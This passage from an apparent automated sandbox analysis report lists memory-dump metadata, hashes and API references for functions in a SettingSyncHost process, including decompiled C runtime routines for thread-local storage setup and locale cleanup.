                                                                                                                                      • Instruction Fuzzy Hash: 8F4192327215168FD708CF39C891BA5F7E1FB98310F198769E42ACB2C1DB35E9148B84
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003F49A3, Relevance: .1, Instructions: 104COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: df374039a1ec8235830c55ee3a6ca55fc8ac3a772c9303e1718171eefd7ff16a
                                                                                                                                      • Instruction ID: 2162deb9d1d0a4831586bf0b55db8244af19c359e7a0eef09fd30878c3c51fef
                                                                                                                                      • Opcode Fuzzy Hash: df374039a1ec8235830c55ee3a6ca55fc8ac3a772c9303e1718171eefd7ff16a
                                                                                                                                      • Instruction Fuzzy Hash: 8721B373F205394B7B0CC47E8C522BDB6E1C68C601745823AE8A6EA2C1D968D917E2E4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003F4883, Relevance: .1, Instructions: 81COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d9a95e161870922b8713be60acd03636d69b112b4dc6e47a5653678df07ba855
                                                                                                                                      • Instruction ID: b0007f28095afc14f1f89efd9a22b755a54dfb922478509c7d346ea71f7313e8
                                                                                                                                      • Opcode Fuzzy Hash: d9a95e161870922b8713be60acd03636d69b112b4dc6e47a5653678df07ba855
                                                                                                                                      • Instruction Fuzzy Hash: E611CA23F30C295B775C81BD8C1327A91D6EBD824030F433AD826E7284E9A4DE13D290
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003DBD60, Relevance: .1, Instructions: 76COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                      • Instruction ID: 9be3ccf046224bcce0c703e2978a61a7c4ffd434c5402d293278324f78670fc0
                                                                                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                      • Instruction Fuzzy Hash: 1A110877244091C3D6078E2EF4B46FBE797EBD932172F426BD0424BB58D322D9459600
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EA4CE, Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f509f8d2448dd614a59530674a118a5ec7eafcc17b1c1d6058280c35db75ccc1
                                                                                                                                      • Instruction ID: 4734b4ff4c12415d8743d7a2518971c212a19b73efa857026713674ebeebb1db
                                                                                                                                      • Opcode Fuzzy Hash: f509f8d2448dd614a59530674a118a5ec7eafcc17b1c1d6058280c35db75ccc1
                                                                                                                                      • Instruction Fuzzy Hash: E5E08632911278EBC715DBCEC504959F3ECE744B00B151556F501E3280C2B4DE40CBD0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00399A94, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 62%
                                                                                                                                      			E00399A94(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t35;
				intOrPtr* _t36;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;

				_t30 = __ebx;
				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t35 != 0) {
					 *0x4edbc0 = GetProcAddress(_t35, "FlsAlloc");
					 *0x4edbc4 = GetProcAddress(_t35, "FlsGetValue");
					 *0x4edbc8 = GetProcAddress(_t35, "FlsSetValue");
					_t7 = GetProcAddress(_t35, "FlsFree");
					__eflags =  *0x4edbc0;
					_t39 = TlsSetValue;
					 *0x4edbcc = _t7;
					if( *0x4edbc0 == 0) {
						L6:
						 *0x4edbc4 = TlsGetValue;
						 *0x4edbc0 = E003996ED;
						 *0x4edbc8 = _t39;
						 *0x4edbcc = TlsFree;
					} else {
						__eflags =  *0x4edbc4;
						if( *0x4edbc4 == 0) {
							goto L6;
						} else {
							__eflags =  *0x4edbc8;
							if( *0x4edbc8 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x3c746c = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x4edbc4);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E003A206A();
							_t41 = __imp__EncodePointer;
							_t14 =  *_t41( *0x4edbc0);
							 *0x4edbc0 = _t14;
							_t15 =  *_t41( *0x4edbc4);
							 *0x4edbc4 = _t15;
							_t16 =  *_t41( *0x4edbc8);
							 *0x4edbc8 = _t16;
							 *0x4edbcc =  *_t41( *0x4edbcc);
							_t18 = E00399C35();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E00399767();
								goto L15;
							} else {
								_t36 = __imp__DecodePointer;
								_t21 =  *((intOrPtr*)( *_t36()))( *0x4edbc0, E003998EB);
								 *0x3c7468 = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E0039A7FF(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t36()))( *0x4edbc8,  *0x3c7468, _t42);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E003997A4(_t30, _t36, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E00399767();
					return 0;
				}
			}





















                                                                                                                                      0x00399a94
                                                                                                                                      0x00399aa2
                                                                                                                                      0x00399aa6
                                                                                                                                      0x00399ac6
                                                                                                                                      0x00399ad3
                                                                                                                                      0x00399ae0
                                                                                                                                      0x00399ae5
                                                                                                                                      0x00399ae7
                                                                                                                                      0x00399aee
                                                                                                                                      0x00399af4
                                                                                                                                      0x00399af9
                                                                                                                                      0x00399b11
                                                                                                                                      0x00399b16
                                                                                                                                      0x00399b20
                                                                                                                                      0x00399b2a
                                                                                                                                      0x00399b30
                                                                                                                                      0x00399afb
                                                                                                                                      0x00399afb
                                                                                                                                      0x00399b02
                                                                                                                                      0x00000000
                                                                                                                                      0x00399b04
                                                                                                                                      0x00399b04
                                                                                                                                      0x00399b0b
                                                                                                                                      0x00000000
                                                                                                                                      0x00399b0d
                                                                                                                                      0x00399b0d
                                                                                                                                      0x00399b0f
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00399b0f
                                                                                                                                      0x00399b0b
                                                                                                                                      0x00399b02
                                                                                                                                      0x00399b35
                                                                                                                                      0x00399b3b
                                                                                                                                      0x00399b40
                                                                                                                                      0x00399b43
                                                                                                                                      0x00399c0a
                                                                                                                                      0x00399c0a
                                                                                                                                      0x00399c0a
                                                                                                                                      0x00399b49
                                                                                                                                      0x00399b50
                                                                                                                                      0x00399b52
                                                                                                                                      0x00399b54
                                                                                                                                      0x00000000
                                                                                                                                      0x00399b5a
                                                                                                                                      0x00399b5a
                                                                                                                                      0x00399b65
                                                                                                                                      0x00399b6b
                                                                                                                                      0x00399b73
                                                                                                                                      0x00399b78
                                                                                                                                      0x00399b80
                                                                                                                                      0x00399b85
                                                                                                                                      0x00399b8d
                                                                                                                                      0x00399b94
                                                                                                                                      0x00399b99
                                                                                                                                      0x00399b9e
                                                                                                                                      0x00399ba0
                                                                                                                                      0x00399c05
                                                                                                                                      0x00399c05
                                                                                                                                      0x00000000
                                                                                                                                      0x00399ba2
                                                                                                                                      0x00399ba2
                                                                                                                                      0x00399bb5
                                                                                                                                      0x00399bb7
                                                                                                                                      0x00399bbc
                                                                                                                                      0x00399bbf
                                                                                                                                      0x00000000
                                                                                                                                      0x00399bc1
                                                                                                                                      0x00399bcd
                                                                                                                                      0x00399bd1
                                                                                                                                      0x00399bd3
                                                                                                                                      0x00000000
                                                                                                                                      0x00399bd5
                                                                                                                                      0x00399be6
                                                                                                                                      0x00399be8
                                                                                                                                      0x00000000
                                                                                                                                      0x00399bea
                                                                                                                                      0x00399bea
                                                                                                                                      0x00399bec
                                                                                                                                      0x00399bed
                                                                                                                                      0x00399bf4
                                                                                                                                      0x00399bfa
                                                                                                                                      0x00399bfe
                                                                                                                                      0x00399c02
                                                                                                                                      0x00399c02
                                                                                                                                      0x00399be8
                                                                                                                                      0x00399bd3
                                                                                                                                      0x00399bbf
                                                                                                                                      0x00399ba0
                                                                                                                                      0x00399b54
                                                                                                                                      0x00399c0e
                                                                                                                                      0x00399aa8
                                                                                                                                      0x00399aa8
                                                                                                                                      0x00399ab0
                                                                                                                                      0x00399ab0

                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00399A9C
                                                                                                                                      • __mtterm.LIBCMT ref: 00399AA8
                                                                                                                                        • Part of subcall function 00399767: DecodePointer.KERNEL32(FFFFFFFF), ref: 00399778
                                                                                                                                        • Part of subcall function 00399767: TlsFree.KERNEL32(FFFFFFFF), ref: 00399792
                                                                                                                                        • Part of subcall function 00399767: DeleteCriticalSection.KERNEL32 ref: 00399C9C
                                                                                                                                        • Part of subcall function 00399767: _free.LIBCMT ref: 00399C9F
                                                                                                                                        • Part of subcall function 00399767: DeleteCriticalSection.KERNEL32(FFFFFFFF), ref: 00399CC6
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00399ABE
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00399ACB
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00399AD8
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00399AE5
                                                                                                                                      • TlsAlloc.KERNEL32 ref: 00399B35
                                                                                                                                      • TlsSetValue.KERNEL32(00000000), ref: 00399B50
                                                                                                                                      • __init_pointers.LIBCMT ref: 00399B5A
                                                                                                                                      • EncodePointer.KERNEL32 ref: 00399B6B
                                                                                                                                      • EncodePointer.KERNEL32 ref: 00399B78
                                                                                                                                      • EncodePointer.KERNEL32 ref: 00399B85
                                                                                                                                      • EncodePointer.KERNEL32 ref: 00399B92
                                                                                                                                      • DecodePointer.KERNEL32(Function_000098EB), ref: 00399BB3
                                                                                                                                      • __calloc_crt.LIBCMT ref: 00399BC8
                                                                                                                                      • DecodePointer.KERNEL32(00000000), ref: 00399BE2
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00399BF4
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                      • API String ID: 3698121176-3819984048
                                                                                                                                      • Opcode ID: bc35c4be2fecc0e16b196f54634ebea9c92c77c9e6e38d30903cec3c2d46c4bb
                                                                                                                                      • Instruction ID: 5926bc16dd7cb4e37b33bd25f6d6967175340d8452ee96000263bd3ba81ba8d4
                                                                                                                                      • Opcode Fuzzy Hash: bc35c4be2fecc0e16b196f54634ebea9c92c77c9e6e38d30903cec3c2d46c4bb
                                                                                                                                      • Instruction Fuzzy Hash: 35314235D003919ECF16AF79AC89B153EA4FB44720B1705BBE424DA2B2EB75A840CF64
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00394935, Relevance: 24.1, APIs: 16, Instructions: 95COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                      			E00394935(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t19;
				void* _t42;
				intOrPtr* _t50;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t50 = E0039A7FF(8, 1);
					_t56 = _t50;
					if(_t50 != 0) {
						_t13 = E0039A7FF(0xd8, 1);
						 *_t50 = _t13;
						__eflags = _t13;
						if(_t13 != 0) {
							_t14 = E0039A7FF(0x220, 1);
							 *((intOrPtr*)(_t50 + 4)) = _t14;
							__eflags = _t14;
							if(_t14 != 0) {
								E00393C5D( *_t50, 0x3c7210);
								_t47 =  *_t50;
								_t17 = E00394719(_a4,  *_t50, _a8);
								_pop(_t42);
								__eflags = _t17;
								if(__eflags != 0) {
									_t19 = E0039A177(_t42, _t47, __eflags,  *((intOrPtr*)( *_t50 + 4)),  *((intOrPtr*)(_t50 + 4)));
									__eflags = _t19;
									if(_t19 == 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t50 + 4)))) = 1;
										 *((intOrPtr*)( *((intOrPtr*)(_t50 + 4)))) = 1;
										L17:
										return _t50;
									}
									E00399DFA( *((intOrPtr*)(_t50 + 4)));
									E00399323( *_t50);
									E003993BC( *_t50);
									E00399DFA(_t50);
									L15:
									_t50 = 0;
									goto L17;
								}
								E00399323( *_t50);
								E003993BC( *_t50);
								E00399DFA(_t50);
								goto L15;
							}
							E00399DFA( *_t50);
							E00399DFA(_t50);
							L8:
							goto L3;
						}
						E00399DFA(_t50);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E0039960F(_t56))) = 0xc;
					goto L4;
				}
			}









                                                                                                                                      0x00394940
                                                                                                                                      0x00394966
                                                                                                                                      0x00000000
                                                                                                                                      0x00394948
                                                                                                                                      0x00394953
                                                                                                                                      0x00394957
                                                                                                                                      0x00394959
                                                                                                                                      0x00394972
                                                                                                                                      0x00394979
                                                                                                                                      0x0039497b
                                                                                                                                      0x0039497d
                                                                                                                                      0x0039498e
                                                                                                                                      0x00394995
                                                                                                                                      0x00394998
                                                                                                                                      0x0039499a
                                                                                                                                      0x003949b3
                                                                                                                                      0x003949be
                                                                                                                                      0x003949c0
                                                                                                                                      0x003949c5
                                                                                                                                      0x003949c6
                                                                                                                                      0x003949c8
                                                                                                                                      0x003949eb
                                                                                                                                      0x003949f2
                                                                                                                                      0x003949f4
                                                                                                                                      0x00394a1c
                                                                                                                                      0x00394a21
                                                                                                                                      0x00394a23
                                                                                                                                      0x00000000
                                                                                                                                      0x00394a23
                                                                                                                                      0x003949f9
                                                                                                                                      0x00394a00
                                                                                                                                      0x00394a07
                                                                                                                                      0x00394a0d
                                                                                                                                      0x00394a15
                                                                                                                                      0x00394a15
                                                                                                                                      0x00000000
                                                                                                                                      0x00394a15
                                                                                                                                      0x003949cc
                                                                                                                                      0x003949d3
                                                                                                                                      0x003949d9
                                                                                                                                      0x00000000
                                                                                                                                      0x003949de
                                                                                                                                      0x0039499e
                                                                                                                                      0x003949a4
                                                                                                                                      0x00394985
                                                                                                                                      0x00000000
                                                                                                                                      0x00394985
                                                                                                                                      0x00394980
                                                                                                                                      0x00000000
                                                                                                                                      0x00394980
                                                                                                                                      0x0039495b
                                                                                                                                      0x00394960
                                                                                                                                      0x00000000
                                                                                                                                      0x00394960

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 888903860-0
                                                                                                                                      • Opcode ID: 12f15651d564fa1329d616e07d3d9b787ae13040ba8b07dc519aa441bcc5a3ae
                                                                                                                                      • Instruction ID: 9d0c9556b0fb350401f97898d9bf8283cd01d8d2a0bac011fe3c9cf92b9f0c6e
                                                                                                                                      • Opcode Fuzzy Hash: 12f15651d564fa1329d616e07d3d9b787ae13040ba8b07dc519aa441bcc5a3ae
                                                                                                                                      • Instruction Fuzzy Hash: D321C7351046019BEF27BF6DD883E1BBBE9EF86760B21441EF4855E291FF329D018651
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E3AC5, Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$Info
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2509303402-0
                                                                                                                                      • Opcode ID: 7d1e762005dd37c2c36f4949c227c61766002dafb81430b5d05b909618b77b3d
                                                                                                                                      • Instruction ID: 1e51728f042aa4de71853f4a3ec4c78424979f7541819a6a9c270e5d8ed88512
                                                                                                                                      • Opcode Fuzzy Hash: 7d1e762005dd37c2c36f4949c227c61766002dafb81430b5d05b909618b77b3d
                                                                                                                                      • Instruction Fuzzy Hash: 59D1DF71D003A59FDB12CFA6C885BEEBBF5BF48300F144269E495AB282D771A945CB10
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003ED2F4, Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 003ED338
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC4BA
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC4CC
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC4DE
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC4F0
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC502
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC514
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC526
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC538
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC54A
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC55C
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC56E
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC580
                                                                                                                                        • Part of subcall function 003EC49D: _free.LIBCMT ref: 003EC592
                                                                                                                                      • _free.LIBCMT ref: 003ED32D
                                                                                                                                        • Part of subcall function 003E5CBF: RtlFreeHeap.NTDLL(00000000,00000000,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7), ref: 003E5CD5
                                                                                                                                        • Part of subcall function 003E5CBF: GetLastError.KERNEL32(003CB0A7,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7,003CB0A7), ref: 003E5CE7
                                                                                                                                      • _free.LIBCMT ref: 003ED34F
                                                                                                                                      • _free.LIBCMT ref: 003ED364
                                                                                                                                      • _free.LIBCMT ref: 003ED36F
                                                                                                                                      • _free.LIBCMT ref: 003ED391
                                                                                                                                      • _free.LIBCMT ref: 003ED3A4
                                                                                                                                      • _free.LIBCMT ref: 003ED3B2
                                                                                                                                      • _free.LIBCMT ref: 003ED3BD
                                                                                                                                      • _free.LIBCMT ref: 003ED3F5
                                                                                                                                      • _free.LIBCMT ref: 003ED3FC
                                                                                                                                      • _free.LIBCMT ref: 003ED419
                                                                                                                                      • _free.LIBCMT ref: 003ED431
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                      • Opcode ID: 869cd617220a7378d59ae0f2ac8a98df9622efe2eafe1c9f8bbfef27ae9a243f
